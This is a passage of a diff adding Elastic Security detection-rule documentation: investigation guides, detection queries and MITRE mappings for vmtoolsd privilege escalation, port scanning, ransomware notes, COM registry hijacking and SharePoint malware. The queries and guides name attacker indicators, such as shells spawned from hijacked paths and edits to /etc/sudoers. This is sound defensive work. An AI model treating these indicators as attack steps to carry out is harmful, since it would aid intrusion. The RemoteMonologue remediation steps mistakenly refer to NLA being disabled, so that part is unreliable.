writable directories (e.g., /tmp, /var/tmp, /dev/shm, or user home) or masquerading as version utilities (lsb_release, rpm, dpkg, dnf, pacman), and record owner, size, hash, and recent timestamps. +- Pull the parent’s and child’s command-line and environment to confirm PATH ordering and whether writable paths precede system binaries, capturing any evidence that get-versions.sh or vmtoolsd invoked a non-standard utility. +- Pivot to subsequent activity from the child process to see if it spawns an interactive shell, escalates EUID to root, touches /etc/sudoers or /etc/passwd, writes to privileged directories, or opens outbound connections. +- Verify integrity of open-vm-tools components by comparing hashes and file sizes of vmtoolsd and serviceDiscovery scripts with vendor packages (rpm -V or dpkg --verify) and checking for unexpected edits, symlinks, or PATH-hijackable calls within the scripts. +- Correlate filesystem creation events and terminal histories to identify the user who dropped or modified the suspicious binary and whether it appeared shortly before the alert, then assess other hosts for the same filename or hash to determine spread. 
+ + +*False positive analysis* + + +- Routine vmtoolsd service discovery via get-versions.sh during VM boot or periodic guest info refresh can legitimately spawn version/package utilities from standard system paths with a default PATH and no execution from writable directories, yet still match this rule. +- Administrator troubleshooting or post-update validation of open-vm-tools—manually running get-versions.sh or restarting vmtoolsd—can cause a shell to launch the script and start expected system utilities in trusted locations, producing a benign alert. + + +*Response and remediation* + + +- Isolate the affected VM, stop the vmtoolsd service, terminate its spawned children (e.g., lsb_release, rpm, dpkg, or /bin/sh launched via open-vm-tools/serviceDiscovery/scripts/get-versions.sh), and temporarily remove execute permissions from the serviceDiscovery scripts to halt exploitation. +- Quarantine and remove any counterfeit or hijacked utilities and symlinks in writable locations (/tmp, /var/tmp, /dev/shm, or user home) that were executed by vmtoolsd/get-versions.sh, capturing full paths, hashes, owners, and timestamps for evidence. +- Recover by reinstalling open-vm-tools from a trusted repository and verifying integrity of vmtoolsd and serviceDiscovery scripts (rpm -V or dpkg --verify), then restart vmtoolsd only after confirming PATH does not include writable directories and that the scripts call absolute binaries under /usr/bin. +- Escalate to full incident response if a vmtoolsd child executed from a writable path ran with EUID 0, spawned an interactive shell (/bin/sh or /bin/bash), or modified /etc/sudoers or /etc/passwd, and initiate credential rotation and a host-wide compromise assessment. +- Harden hosts by enforcing a safe PATH (e.g., /usr/sbin:/usr/bin:/sbin:/bin), removing writable directories from system and user environment files, mounting /tmp,/var/tmp,/dev/shm with noexec,nosuid,nodev, and applying AppArmor/SELinux policies to block vmtoolsd from executing binaries outside system directories. +- Prevent recurrence by deploying the vendor fix for CVE-2025-41244 across all Linux VMs, pinning or replacing the open-vm-tools serviceDiscovery scripts with versions that use absolute paths, and adding EDR allowlists/blocks so vmtoolsd cannot launch binaries from writable paths. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +event.action in ("exec", "exec_event", "start", "executed", "process_started", "ProcessRollup2") and +( + ( + process.parent.name == "vmtoolsd" + ) or + ( + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and + ?process.parent.args like ("/*/open-vm-tools/serviceDiscovery/scripts/get-versions.sh") + ) +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host.asciidoc new file mode 100644 index 0000000000..7da7163541 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host.asciidoc @@ -0,0 +1,188 @@ +[[prebuilt-rule-8-19-8-potential-port-scanning-activity-from-compromised-host]] +=== Potential Port Scanning Activity from Compromised Host + +This rule detects potential port scanning activity from a compromised host. Port scanning is a common reconnaissance technique used by attackers to identify open ports and services on a target system. A compromised host may exhibit port scanning behavior when an attacker is attempting to map out the network topology, identify vulnerable services, or prepare for further exploitation. This rule identifies potential port scanning activity by monitoring network connection attempts from a single host to a large number of ports within a short time frame. ESQL rules have limited fields available in its alert documents. Make sure to review the original documents to aid in the investigation of this alert. 
+
+*Rule type*: esql
+
+*Rule indices*: None
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 1h
+
+*Searches indices from*: now-61m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*: None
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Linux
+* Use Case: Threat Detection
+* Tactic: Discovery
+* Data Source: Elastic Defend
+* Resources: Investigation Guide
+
+*Version*: 7
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating Potential Port Scanning Activity from Compromised Host*
+
+
+Port scanning is a reconnaissance method used by attackers to identify open ports and services on a network, often as a precursor to exploitation. In Linux environments, compromised hosts may perform rapid connection attempts to numerous ports, signaling potential scanning activity. The detection rule identifies such behavior by analyzing network logs for a high number of distinct port connections from a single host within a short timeframe, indicating possible malicious intent.
+
+
+*Possible investigation steps*
+
+
+- Review the network logs to identify the specific host exhibiting the port scanning behavior by examining the destination.ip and process.executable fields.
+- Analyze the @timestamp field to determine the exact time frame of the scanning activity and correlate it with any other suspicious activities or alerts from the same host.
+- Investigate the process.executable field to understand which application or service initiated the connection attempts, and verify if it is a legitimate process or potentially malicious.
+- Check the destination.port field to identify the range and types of ports targeted by the scanning activity, which may provide insights into the attacker's objectives or the services they are interested in.
+- Assess the host's security posture by reviewing recent changes, installed software, and user activity to determine if the host has been compromised or if the scanning is part of legitimate network operations.
+- Consult the original documents and logs for additional context and details that may not be captured in the alert to aid in a comprehensive investigation.
+
+
+*False positive analysis*
+
+
+- Legitimate network scanning tools used by system administrators for network maintenance or security assessments can trigger this rule. To handle this, identify and whitelist the IP addresses or processes associated with these tools.
+- Automated vulnerability scanners or monitoring systems that perform regular checks on network services may cause false positives. Exclude these systems by creating exceptions for their known IP addresses or process names.
+- High-volume legitimate services that open multiple connections to different ports, such as load balancers or proxy servers, might be flagged. Review and exclude these services by specifying their IP addresses or process executables.
+- Development or testing environments where frequent port scanning is part of routine operations can be mistakenly identified. 
Implement exceptions for these environments by excluding their specific network segments or host identifiers. +- Scheduled network discovery tasks that are part of IT operations can mimic port scanning behavior. Document and exclude these tasks by setting up time-based exceptions or identifying their unique process signatures. + + +*Response and remediation* + + +- Isolate the compromised host from the network immediately to prevent further scanning and potential lateral movement. +- Terminate any suspicious processes identified by the process.executable field to halt ongoing malicious activities. +- Conduct a thorough review of the compromised host's system logs and network traffic to identify any unauthorized access or data exfiltration attempts. +- Patch and update all software and services on the compromised host to close any vulnerabilities that may have been exploited. +- Change all credentials associated with the compromised host and any potentially affected systems to prevent unauthorized access. +- Monitor the network for any further signs of scanning activity or other suspicious behavior from other hosts, indicating potential additional compromises. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems are affected. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. 
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.network-* +| where + @timestamp > now() - 1h and + host.os.type == "linux" and + event.type == "start" and + event.action == "connection_attempted" and + network.direction == "egress" and + destination.port < 32768 and + not ( + cidr_match(destination.ip, "127.0.0.0/8", "::1", "FE80::/10", "FF00::/8") or + process.executable in ( + "/opt/dbtk/bin/jsvc", "/usr/lib/dotnet/dotnet", "/usr/share/elasticsearch/jdk/bin/java", "/usr/sbin/haproxy", + "/usr/bin/java", "/opt/kaspersky/kesl/libexec/kesl", "/usr/bin/dotnet", "/opt/java/openjdk/bin/java" + ) or + process.executable like "/var/opt/kaspersky/kesl/*kesl" or + process.executable like "/usr/lib/jvm/*/java" or + process.executable like "/opt/google/chrome*" or + process.executable like "/var/lib/docker/*/java" or + process.executable like "/usr/lib64/jvm/*/java" or + process.executable like "/snap/*" or + process.executable like "/home/*/.local/share/JetBrains/*" + ) +| keep + @timestamp, + host.os.type, + event.type, + event.action, + destination.port, + process.executable, + destination.ip, + source.ip, + agent.id, + host.name +| stats + Esql.event_count = count(), + Esql.destination_port_count_distinct = count_distinct(destination.port), + Esql.agent_id_count_distinct = count_distinct(agent.id), + Esql.host_name_values = values(host.name), + Esql.agent_id_values = values(agent.id), + Esql.source_ip_values = values(source.ip) + by process.executable, destination.ip +| where + Esql.agent_id_count_distinct == 1 and + Esql.destination_port_count_distinct > 100 +| sort Esql.event_count asc +| limit 100 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system.asciidoc new file mode 100644 index 0000000000..2d3e1ae7f3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system.asciidoc @@ -0,0 +1,135 @@ +[[prebuilt-rule-8-19-8-potential-ransomware-behavior-note-files-by-system]] +=== Potential Ransomware Behavior - Note Files by System + +This rule identifies the creation of multiple files with same name and over SMB by the same user. This behavior may indicate the successful remote execution of a ransomware dropping file notes to different folders. 
+ +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 211 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Possible investigation steps* + + +- Investigate the content of the dropped files. +- Investigate any file names with unusual extensions. +- Investigate any incoming network connection to port 445 on this host. +- Investigate any network logon events to this host. +- Identify the total number and type of modified files by pid 4. +- If the number of files is too high and source.ip connecting over SMB is unusual isolate the host and block the used credentials. +- Investigate other alerts associated with the user/host during the past 48 hours. + + +*False positive analysis* + + +- Local file modification from a Kernel mode driver. + + +*Related rules* + + +- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9 +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 +- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57 +- Potential Ransomware Note File Dropped via SMB - 02bab13d-fb14-4d7c-b6fe-4a28874d37c5 +- Suspicious File Renamed via SMB - 78e9b5d5-7c07-40a7-a591-3dbbf464c386 + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities. +- If any backups were affected: + - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
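+
+
+To help quantify the activity described in the investigation steps above, for example identifying the number and type of files created by the System virtual process (PID 4), the following is a minimal ES|QL sketch. It is illustrative only: the host name is a placeholder, and the fields mirror those used in the rule query below.
+
+[source, js]
+----------------------------------
+// Hypothetical triage pivot - replace "host-01" with the affected host.name value
+from logs-endpoint.events.file-*
+| where host.os.type == "windows" and
+  event.category == "file" and
+  event.action == "creation" and
+  process.pid == 4 and
+  host.name == "host-01"
+| stats
+    file_count = count(),
+    path_count = count_distinct(file.path)
+  by file.extension
+| sort file_count desc
+----------------------------------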
+ + +==== Rule query + + +[source, js] +---------------------------------- +from logs-endpoint.events.file-* metadata _id, _version, _index + +// filter for file creation event done remotely over SMB with common user readable file types used to place ransomware notes +| where event.category == "file" and host.os.type == "windows" and event.action == "creation" and process.pid == 4 and user.id != "S-1-5-18" and + file.extension in ("txt", "htm", "html", "hta", "pdf", "jpg", "bmp", "png", "pdf") + +// truncate the timestamp to a 60-second window +| eval Esql.time_window_date_trunc = date_trunc(60 seconds, @timestamp) + +| keep file.path, file.name, process.entity_id, Esql.time_window_date_trunc + +// filter for same file name dropped in at least 3 unique paths by the System virtual process +| stats Esql.file_path_count_distinct = COUNT_DISTINCT(file.path), Esql.file_path_values = VALUES(file.path) by process.entity_id , file.name, Esql.time_window_date_trunc +| where Esql.file_path_count_distinct >= 3 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-remotemonologue-attack.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-remotemonologue-attack.asciidoc new file mode 100644 index 0000000000..a75c69fa37 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-potential-remotemonologue-attack.asciidoc @@ -0,0 +1,157 @@ +[[prebuilt-rule-8-19-8-potential-remotemonologue-attack]] +=== Potential RemoteMonologue Attack + +Identifies attempt to perform session hijack via COM object registry modification by setting the RunAs value to Interactive User. 
+ +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.registry-* +* endgame-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-windows.sysmon_operational-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions#1 +* https://github.com/xforcered/RemoteMonologue + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Data Source: Elastic Endgame +* Data Source: Microsoft Defender for Endpoint +* Data Source: SentinelOne +* Data Source: Sysmon +* Resources: Investigation Guide + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Potential RemoteMonologue Attack* + + + + +*Possible investigation steps* + + +- Review the registry event logs to confirm the modification of the RunAs value in the specified registry paths, ensuring the change was not part of a legitimate administrative action. +- Identify the user account and process responsible for the registry modification by examining the event logs for associated user and process information. +- Check for any recent remote authentication attempts or sessions on the affected host to determine if this activity is associated with lateral movement or not. +- Investigate the timeline of the registry change to correlate with any other suspicious activities or alerts on the host, such as the execution of unusual processes or network connections. + + +*False positive analysis* + + +- Software updates or installations that modify COM settings. +- Automated scripts or management tools that adjust COM configurations. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary. +- Modify the registry value back to its secure state, ensuring that "RunAs" value is not set to "Interactive User". +- Conduct a thorough review of recent user activity and system logs to identify any unauthorized access or changes made during the period NLA was disabled. +- Reset passwords for all accounts that have accessed the affected system to mitigate potential credential compromise. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. +- Implement enhanced monitoring on the affected system and similar endpoints to detect any further attempts to disable NLA or other suspicious activities. 
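+
+
+To support the registry review described in the investigation steps above, the following is a minimal ES|QL sketch that lists recent "RunAs" value modifications on the affected host, together with the responsible user and process. It is illustrative only: the host name is a placeholder, and the fields mirror those used in the rule query below.
+
+[source, js]
+----------------------------------
+// Hypothetical triage pivot - replace "host-01" with the affected host.name value
+from logs-endpoint.events.registry-*
+| where host.os.type == "windows" and
+  host.name == "host-01" and
+  registry.value == "RunAs"
+| keep @timestamp, user.name, process.name, process.executable, registry.path, registry.data.strings
+| sort @timestamp desc
+| limit 50
+----------------------------------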
+ + +==== Rule query + + +[source, js] +---------------------------------- +registry where host.os.type == "windows" and event.action != "deletion" and + registry.value == "RunAs" and registry.data.strings : "Interactive User" and + + not + ( + ( + process.executable : ( + "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.*\\MsMpEng.exe", + "C:\\Program Files\\Windows Defender\\MsMpEng.exe" + ) and + registry.path : "*\\SOFTWARE\\Classes\\AppID\\{1111A26D-EF95-4A45-9F55-21E52ADF9887}\\RunAs" + ) or + ( + process.executable : ( + "C:\\Program Files\\TeamViewer\\TeamViewer.exe", + "C:\\Program Files (x86)\\TeamViewer\\TeamViewer.exe" + ) and + registry.path : "*\\SOFTWARE\\Classes\\AppID\\{850A928D-5456-4865-BBE5-42635F1EBCA1}\\RunAs" + ) or + ( + process.executable : "C:\\Windows\\System32\\svchost.exe" and + registry.path : "*\\S-1-*Classes\\AppID\\{D3E34B21-9D75-101A-8C3D-00AA001A1652}\\RunAs" + ) or + ( + process.executable : "C:\\Windows\\System32\\SecurityHealthService.exe" and + registry.path : ( + "*\\SOFTWARE\\Classes\\AppID\\{1D278EEF-5C38-4F2A-8C7D-D5C13B662567}\\RunAs", + "*\\SOFTWARE\\Classes\\AppID\\{7E55A26D-EF95-4A45-9F55-21E52ADF9878}\\RunAs" + ) + ) or + ( + process.executable : "C:\\Windows\\System32\\SecurityHealthService.exe" and + registry.path : ( + "*\\SOFTWARE\\Classes\\AppID\\{1D278EEF-5C38-4F2A-8C7D-D5C13B662567}\\RunAs", + "*\\SOFTWARE\\Classes\\AppID\\{7E55A26D-EF95-4A45-9F55-21E52ADF9878}\\RunAs" + ) + ) or + registry.path : ( + "HKLM\\SOFTWARE\\Microsoft\\Office\\ClickToRun\\VREGISTRY_*", + "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Office\\ClickToRun\\VREGISTRY_*" + ) or + (process.executable : "C:\\windows\\System32\\msiexec.exe" and ?user.id : "S-1-5-18") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-sharepoint-malware-file-upload.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-sharepoint-malware-file-upload.asciidoc new file mode 100644 index 0000000000..26196a76e2 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-sharepoint-malware-file-upload.asciidoc @@ -0,0 +1,127 @@ +[[prebuilt-rule-8-19-8-sharepoint-malware-file-upload]] +=== SharePoint Malware File Upload + +Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment. 
+ +*Rule type*: query + +*Rule indices*: + +* logs-o365.audit-* +* filebeat-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide + +*Tags*: + +* Domain: Cloud +* Data Source: Microsoft 365 +* Tactic: Lateral Movement +* Resources: Investigation Guide + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating SharePoint Malware File Upload* + + +SharePoint, a collaborative platform, facilitates file sharing and storage within organizations. Adversaries exploit this by uploading malware, leveraging the platform's sharing capabilities to propagate threats laterally. The detection rule identifies when SharePoint's file scanning engine flags an upload as malicious, focusing on specific audit events to alert security teams of potential lateral movement threats. + + +*Possible investigation steps* + + +- Review the specific event details in the alert, focusing on the event.dataset, event.provider, event.code, and event.action fields to confirm the alert is related to a SharePoint file upload flagged as malware. +- Identify the user account associated with the file upload by examining the audit logs and determine if the account has a history of suspicious activity or if it has been compromised. +- Analyze the file metadata, including the file name, type, and size, to gather more context about the nature of the uploaded file and assess its potential impact. +- Check the file's sharing permissions and access history to identify other users or systems that may have interacted with the file, assessing the risk of lateral movement. +- Investigate the source of the file upload, such as the originating IP address or device, to determine if it aligns with known malicious activity or if it is an anomaly for the user. +- Coordinate with the IT team to isolate affected systems or accounts if necessary, and initiate a response plan to mitigate any potential spread of the malware within the organization. + + +*False positive analysis* + + +- Legitimate software updates or patches uploaded to SharePoint may be flagged as malware. To handle this, create exceptions for known update files by verifying their source and hash. +- Internal security tools or scripts used for testing purposes might trigger false positives. Maintain a list of these tools and exclude them from alerts after confirming their legitimacy. +- Files with encrypted content, such as password-protected documents, can be mistakenly identified as malicious. Implement a process to review and whitelist these files if they are from trusted sources. +- Large batch uploads from trusted departments, like IT or HR, may occasionally be flagged. Establish a review protocol for these uploads and whitelist them if they are verified as safe. +- Files with macros or executable content used in legitimate business processes might be detected. 
Work with relevant departments to identify and exclude these files from alerts after thorough validation. + + +*Response and remediation* + + +- Immediately isolate the affected SharePoint site or library to prevent further access and sharing of the malicious file. This can be done by restricting permissions or temporarily disabling access to the site. +- Notify the security operations team and relevant stakeholders about the detected malware to ensure awareness and initiate a coordinated response. +- Quarantine the identified malicious file to prevent it from being accessed or executed by users. Use SharePoint's built-in capabilities or integrated security tools to move the file to a secure location. +- Conduct a thorough scan of the affected SharePoint site and connected systems to identify any additional malicious files or indicators of compromise. Use advanced threat detection tools to ensure comprehensive coverage. +- Review and revoke any unauthorized access or sharing permissions that may have been granted to the malicious file, ensuring that only legitimate users have access to sensitive data. +- Escalate the incident to the incident response team if there are signs of lateral movement or if the malware has spread to other parts of the network, following the organization's escalation protocols. +- Implement enhanced monitoring and logging for SharePoint and related services to detect any future attempts to upload or share malicious files, leveraging the specific query fields used in the detection rule. + +==== Setup + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Taint Shared Content +** ID: T1080 +** Reference URL: https://attack.mitre.org/techniques/T1080/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ +* Sub-technique: +** Name: Upload Malware +** ID: T1608.001 +** Reference URL: https://attack.mitre.org/techniques/T1608/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-startup-or-run-key-registry-modification.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-startup-or-run-key-registry-modification.asciidoc new file mode 100644 index 0000000000..6616646522 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-startup-or-run-key-registry-modification.asciidoc @@ -0,0 +1,187 @@ +[[prebuilt-rule-8-19-8-startup-or-run-key-registry-modification]] +=== Startup or Run Key Registry Modification + +Identifies run key or startup key registry modifications. In order to survive reboots and other system interrupts, attackers will modify run keys within the registry or leverage startup folder items as a form of persistence. 
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* logs-endpoint.events.registry-*
+
+*Severity*: low
+
+*Risk score*: 21
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Persistence
+* Resources: Investigation Guide
+* Data Source: Elastic Endgame
+* Data Source: Elastic Defend
+
+*Version*: 118
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Startup or Run Key Registry Modification*
+
+
+Adversaries may achieve persistence by referencing a program with a registry run key. Adding an entry to the run keys in the registry will cause the program referenced to be executed when a user logs in. These programs will be executed in the context of the user and will have the account's permissions. This rule looks for this behavior by monitoring a range of registry run keys.
+
+> **Note**:
+> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.
+
+
+*Possible investigation steps*
+
+
